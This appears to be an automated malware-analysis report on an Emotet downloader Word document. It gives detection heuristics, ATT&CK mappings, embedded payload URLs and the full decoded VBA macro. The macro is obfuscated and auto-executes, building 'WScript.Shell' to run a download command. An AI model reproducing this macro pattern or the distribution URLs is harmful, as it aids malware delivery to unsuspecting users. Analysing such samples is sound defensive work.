MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, and the ClamAV signature specifically identifies it as Emotet. The VBA code attempts to construct the string 'WscRipt.sHeLl' and likely uses it to download and execute a second-stage payload from the embedded URLs.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6818423-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6818423-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
End Select IndustrialToolsHealth43 = "" + Planner94 + backingup15 + "WscRipt.sHeLl" + USB15 + ErgonomicSoftHat98 + Directives39 Select Case metrics60 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
End Select strategic38 = Array(Yen36, Administrator66, Technician3, CreateObject("" + Accountability21 + neural56 + intangible60 + IndustrialToolsHealth43).Run!("" + Denmark84 + Futureproofed61 + Associate63 + Concrete21.TextBox1 + Rubber14 + CreditCardAccount87 + eservices10 + architectures99, iDBRTHsrUdw), Strategist92, bus96, KidsGames76) Select Case deposit37 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "District83" Sub autoopen() deposit18 = worldclass65 -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://waliwalo.com/Y6o7VhuKPU@http://advantechnologies.com/fTkdPAD@http://www.emmanu In document text (OLE body)
- http://affinity7.com/SM93gJVMw@http://titheringtons.com/85qJTUNyLIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5036 bytes |
SHA-256: a2adc0701bf705bbb20b744fcbdd6fd3468bdfe8c20c3e8579e3f2946bf44ed0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Concrete21"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "functionalities83"
Function National16()
On Error Resume Next
Select Case primary62
Case 871
purple60 = CLng(742)
hack84 = AutoLoanAccount10
webreadiness39 = CDate(capacitor31)
invoice73 = quantify39
CheckingAccount38 = Int(783)
Case 882
Berkshire30 = eyeballs14
Ergonomic50 = Cos(Identity45)
Industrial86 = deposit15
Assurance5 = ChrB(175)
seamless53 = knowledgebase14
End Select
Select Case Metal57
Case 105
Global14 = CLng(98)
HandmadeCottonKeyboard57 = bypassing30
Corporate34 = CDate(leverage96)
scale36 = deploy32
ClothingBooks1 = Int(594)
Case 248
Buckinghamshire37 = reboot39
Rubber76 = Cos(application81)
webservices29 = Berkshire54
deliverables5 = ChrB(247)
Plastic46 = Web22
End Select
IndustrialToolsHealth43 = "" + Planner94 + backingup15 + "WscRipt.sHeLl" + USB15 + ErgonomicSoftHat98 + Directives39
Select Case metrics60
Case 858
transmit24 = CLng(400)
override32 = virtual65
Camp78 = CDate(withdrawal20)
withdrawal45 = Customizable61
Buckinghamshire38 = Int(664)
Case 600
GenericSteelChair7 = Manager45
USDollar10 = Cos(THX35)
PracticalRubberCheese27 = HandmadeRubberGloves85
throughput38 = ChrB(129)
calculate91 = emarkets44
End Select
Select Case objectoriented57
Case 698
NewMexico36 = CLng(630)
Fresh13 = Sleek50
Unbranded62 = CDate(Ohio28)
SDD73 = cyan10
modular93 = Int(614)
Case 604
Australia16 = driver78
Awesome44 = Cos(SleekGraniteHat14)
copying23 = bluetooth96
Movies34 = ChrB(662)
Creative35 = SmallRubberChicken67
End Select
Select Case FantasticFreshHat95
Case 16
Soft24 = CLng(787)
synergistic11 = utilisation2
Throughway76 = CDate(valueadded54)
mobile10 = connecting81
Markets71 = Int(941)
Case 600
Multichannelled32 = w4thgeneration16
Plaza97 = Cos(NorthKoreanWon52)
GenericWoodenPants15 = withdrawal27
deposit36 = ChrB(341)
users13 = parsing33
End Select
iDBRTHsrUdw = 0
Select Case Gorgeous40
Case 541
deposit58 = CLng(225)
Point18 = realtime99
payment89 = CDate(Frozen99)
payment7 = Engineer74
Intelligent26 = Int(415)
Case 643
Village58 = dynamic67
Metal17 = Cos(relationships21)
CheckingAccount50 = mobile60
productivity93 = ChrB(122)
InvestmentAccount77 = LicensedPlasticCheese99
End Select
Select Case optical74
Case 927
paradigms31 = CLng(903)
lime51 = Frozen69
PersonalLoanAccount85 = CDate(Shoes42)
Tenge16 = granular81
PracticalWoodenSausages82 = Int(265)
Case 389
methodology75 = magenta72
olive45 = Cos(ElectronicsToys44)
maximize39 = intuitive3
Islands16 = ChrB(12)
Kansas67 = Prairie97
End Select
strategic38 = Array(Yen36, Administrator66, Technician3, CreateObject("" + Accountability21 + neural56 + intangible60 + IndustrialToolsHealth43).Run!("" + Denmark84 + Futureproofed61 + Associate63 + Concrete21.TextBox1 + Rubber14 + CreditCardAccount87 + eservices10 + architectures99, iDBRTHsrUdw), Strategist92, bus96, KidsGames76)
Select Case deposit37
Case 894
Concrete43 = CLng(882)
framework18 = Oregon96
navigate68 = CDate(copy70)
BabyIndustrial39 = Frozen77
z1080p85 = Int(850)
Case 939
National65 = webenabled30
Fields7 = Cos(unleash72)
SmallRubberComputer44 = seamless22
Legacy31 = ChrB(16)
connecting9 = Nigeria58
End Select
Select Case Product43
Case 332
Dynamic47 = CLng(583)
CheckingAccount12 = Consultant25
Oregon25 = CDate(quantifying49)
Markets8 = Virginia13
GenericGraniteKeyboard26 = Int(265)
Case 783
auxiliary68 = Assistant92
Dam27 = Cos(Divide37)
Handmade37 = synthesizing52
productivity20 = ChrB(977)
pixel18 = GB39
End Select
End Function
Attribute VB_Name = "District83"
Sub autoopen()
deposit18 = worldclass65
Rupiah62 = Array(Haiti24, TunisianDinar26, logistical62, National16, extensible65, program55, approach1)
Multichannelled21 = invoice2
End Sub
Function TurkishLira1()
HTTP78 = strategic61
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.